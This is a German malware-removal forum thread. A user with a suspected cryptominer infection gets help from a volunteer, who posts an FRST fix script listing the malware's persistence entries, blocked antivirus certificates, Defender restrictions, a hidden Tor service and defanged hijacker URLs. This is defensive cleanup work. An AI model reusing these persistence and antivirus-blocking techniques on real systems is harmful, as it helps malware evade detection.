Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: trojaner?/virus?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 27.05.2018, 12:19   #1
moinbro
 
trojaner?/virus? - Standard

trojaner?/virus?



Vorgeschichte:
Ich habe mir diverse mods für GTA SA heruntergeladen und dazu auch diverse mod installer und IMG editoren. Bei den Dateien die ich mir runtergeladen habe war wohl eine nicht so nette datei dabei, die immerwieder firefox oder internet explorer geöffnet hat und streaming seiten geöffnet hat.Im Taskmanager liefen Tasks, die nicht auf meinem Rechner verloren haben.
Ich bin soweit, dass ich einige Taskts beendet habe und die dazugehörigen Dateien gelöscht habe.Firefox und internet explorer laufen wieder einwandfrei und werden auch nicht einfach so geöffnet
( allerding habe ich 3 bis 4 tasks von firefox im tasksmanager, ebenso bei spotify. ist das normal?)

Momentanes Problem
.Jetzt hab ich nurnoch das Problem, dass mein CPU auf dauerauslastung läuft d.h dauerhaft 100% was nicht normal ist. selbst wenn ich games spiele bzw. gespielt habe wie zb pubg oder arma (welche in der Regel viel leistung brauchen) auf maximal 60-70% und jetzt habe ich eine 100 % auslastung nur auf dem desktop.

Ich bedanke mich schonmal recht herzlich im voraus für die Hilfe.
Ihr könnt euch auch im Teamspeak³ bei mir melden wenn ihr möchtet: monsterclaw.de (geht vermutlich schneller so)
Rechtschreib fehler sind beabsichtigt.

Alt 27.05.2018, 21:19   #2
M-K-D-B
/// TB-Ausbilder
 
trojaner?/virus? - Standard

trojaner?/virus?









Mein Name ist Matthias und ich werde dir bei der Bereinigung deines Computers helfen.



Um die Bereinigung möchlichst effektiv und schnell gestalten zu können, bitte ich um Beachtung der folgenden Hinweise:
  1. Falls wir Hinweise auf illegal erworbene Software finden, werden wir den Support unterbrechen bis jegliche Art von illegaler Software vom Rechner entfernt wurde.

  2. Lies dir meine Anleitungen immer sorgfältig durch, arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste immer alle Logdateien (auch wenn nichts gefunden wurde). Solltest du Probleme haben, stoppe mit deiner Bearbeitung und beschreibe mir dein Problem so gut es geht.

  3. Solltest du mir nicht innerhalb von 3 Tagen antworten, gehe ich davon aus, dass du keine Hilfe mehr benötigst. Dann lösche ich dein Thema aus meinem Abo. Solltest du einmal länger abwesend sein, so gib mir bitte Bescheid!

  4. Während der Bereinigung bitte nichts installieren oder deinstallieren, außer ich bitte dich darum!
    Außerdem bitte ich dich, nicht eigenmächtig irgendwelche Sicherheitsprogramme auszuführen und damit deinen Rechner zu überprüfen/bereinigen, da ich so leicht den Überblick verlieren kann.
    Zudem hättest du dir das Eröffnen eines Themas in diesem Fall auch gleich sparen können, wenn du dann doch wieder alleine rumhantierst.


  5. Bitte beachten: Download bei filepony.de: So ladet Ihr unsere Tools richtig!

  6. Alle zu verwendenen Programme sind auf dem Desktop ( C:\users\dein Benutzername\Desktop\ ) abzuspeichern und von dort als Administrator zu starten!

  7. Einige Programme, die wir hier verwenden, können unter Umständen von deinem Antiviren- oder Anti-Malwareprogramm fälschlicherweise als Bedrohung eingestuft werden. Die Sicherheitsprogramme können aufgrund eines bestimmten Programmverhaltens nicht zwischen "gut" oder "böse" unterscheiden und schlagen Alarm. Dabei handelt es sich um Fehlalarme, welche du getrost ignorieren kannst. Gegebenenfalls musst du deine Sicherheitssoftware vor der Ausführung eines Programms deaktivieren, damit unsere Bereinigungsvorgänge nicht beeinträchtigt werden.

  8. Sollten die Logdateien einmal die zulässige Länge (~ 120.000 Zeichen) überschreiten, so teile die Logdateien auf mehrere Posts auf.
    Zur Not kannst du die Logdateien dann auch zippen (in ein .zip Archiv packen) und als Anhang hochladen.


  9. Bitte arbeite so lange mit mir zusammen, bis ich dir sage, dass wir fertig sind und dein Rechner "sauber" ist. Das vorzeitige Verschwinden von Symptomen heißt nicht automatisch, dass dein Rechner bereits vollständig sauber ist.
    Du musst die hier verwendeten Programme NICHT selbst von deinem Computer entfernen. Das erledigt das TBCleanUpTool am Ende automatisch für dich.


  10. In der Regel antworte ich dir innerhalb von 24 Stunden, oft sogar wesentlich schneller.
    Jedoch habe auch ich einen normalen Beruf und Familie. Ich bin daher nicht jeden Tag stundenlag hier im Forum unterwegs. Es kann unter Umständen bis zu 2 Tage dauern, bis du eine Antwort von mir erhältst. Sollte diese Zeit überschritten sein, so kannst du mir gerne eine PM als Erinnerung schicken.





Bitte arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste alle Logdateien in CODE-Tags:
So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert deinem Helfer massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke aauf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Danke für deine Mitarbeit!







Schritt 1
Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)








Bitte poste mit deiner nächsten Antwort
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt).
__________________

__________________

Alt 28.05.2018, 16:32   #3
moinbro
 
trojaner?/virus? - Standard

trojaner?/virus?



Die logs sind zu lange, selbst 1 Log ist zu lange. wie kann ich die posten?

Ich habe mal was gelesen, dass wenn die logs zu lange sind man sie in eine Zip oder rar datei machen soll. da bräuchte ich hilfe, da ich nicht weiß wie ich das mache danke im voraus.
__________________

Alt 28.05.2018, 21:09   #4
M-K-D-B
/// TB-Ausbilder
 
trojaner?/virus? - Standard

trojaner?/virus?



Zitat:
Zitat von moinbro Beitrag anzeigen
Ich habe mal was gelesen, dass wenn die logs zu lange sind man sie in eine Zip oder rar datei machen soll. da bräuchte ich hilfe, da ich nicht weiß wie ich das mache danke im voraus.
Rechtsklicke auf die FRST.txt bzw. Addition.txt
Wähle Senden an > Zip komprimierter Ordner

Die Archive kannst du dann als Anhang mit deiner nächsten Antwort hochladen.
__________________
Gruß
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterstützen

Alt 30.05.2018, 09:51   #5
moinbro
 
trojaner?/virus? - Standard

trojaner?/virus?



Vielen Dank

Was mir noch eingefallen ist in meinen ersten Post zu schreiben, ich habe mich bisschen erkundigt im Internet und im Task manager habe ich auf jeden fall den Xmrig.exe trojaner(?) die symptome sind gleich wie im Internet beschrieben bzw. sie waren gleich, denn ich habe meine pc jetzt ca 2 tage laufen lassen und jetzt ist der Task nichtmehr da. Der CPU läuft jetzt nichtmehr auf 100% sondern auf 75% (was auch zu viel ist für normal zustand). Mein Ram war auf 7.3 ( habe 8Ram (2x 4Ram)) jetzt ist mein Ram auf 4.3, was eigentlich normal ist für meinen Rechner. Ich traue der Sache aber irgendwie nicht, ich habe nichts gemacht und auf einmal ist der Task nichtmehr da. Ich wollte es nur mal erwähnen falls es hilft

Die logs sind im Anhang

Angehängte Dateien
Dateityp: zip FRST_28-05-2018 16.21.05.zip (26,9 KB, 9x aufgerufen)
Dateityp: zip Addition_28-05-2018 16.21.05.zip (11,3 KB, 7x aufgerufen)

Alt 30.05.2018, 16:17   #6
M-K-D-B
/// TB-Ausbilder
 
trojaner?/virus? - Standard

trojaner?/virus?



Servus,



schlechte Nachrichten... dein Rechner ist voll mit Malware infiziert.

Du bist sogar mit Adware infiziert, von der ich dachte, dass sie "tot" sei... naja, so kann man sich irren...

Daher bist du ab sofort mein Lieblingsuser!

Wir starten gleich mit dem ersten Teil der Bereinigung.





Schritt 1
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    CloseProcesses:
    HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
    C:\Program Files (x86)\Common Files\new.bat
    HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
    HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
    HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
    HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
    HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
    HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
    HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
    HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
    HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
    HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
    HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
    HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
    HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
    HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
    HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
    HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
    HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
    HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
    C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
    C:\Program Files\RDH9TH3UTU
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
    C:\Users\Nico\AppData\Roaming\okdd3kogot1
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
    C:\Program Files (x86)\eu0vb4pykb5
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
    C:\Users\Nico\AppData\Local\pfialx.dll
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
    C:\Program Files\I88TDHYW3R
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
    C:\Windows\rss\csrss.exe
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe 
    C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
    C:\Users\Nico\AppData\Roaming\EpicNet Inc
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
    ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
    GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
    CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
    HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
    FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
    C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
    FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
    FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
    FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
    R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
    C:\ProgramData\Logic Cramble
    R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
    C:\Users\Nico\AppData\Local\XService
    S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
    C:\Program Files\SystemaRev
    R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
    Unlock: C:\Windows\windefender.exe
    C:\Windows\windefender.exe
    R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
    C:\Windows\qcusolizqbhuglpw.qcus
    S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
    S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
    S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
    C:\ProgramData\PrefsSecure
    S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
    C:\Program Files (x86)\ProxyGate
    R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\csrss
    S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
    C:\ProgramData\Microsoft\Windows\WNetworkMgmt
    S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
    S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
    S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
    C:\Windows\System32\drivers\WinmonProcessMonitor.sys
    C:\Windows\System32\drivers\WinmonFS.sys
    C:\Windows\System32\drivers\Winmon.sys
    2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
    2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
    2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
    2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
    2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
    2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
    2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
    2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
    2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
    2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
    2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
    2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
    2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
    2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
    2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
    2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
    2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
    2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
    2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
    2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
    2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
    2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
    2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
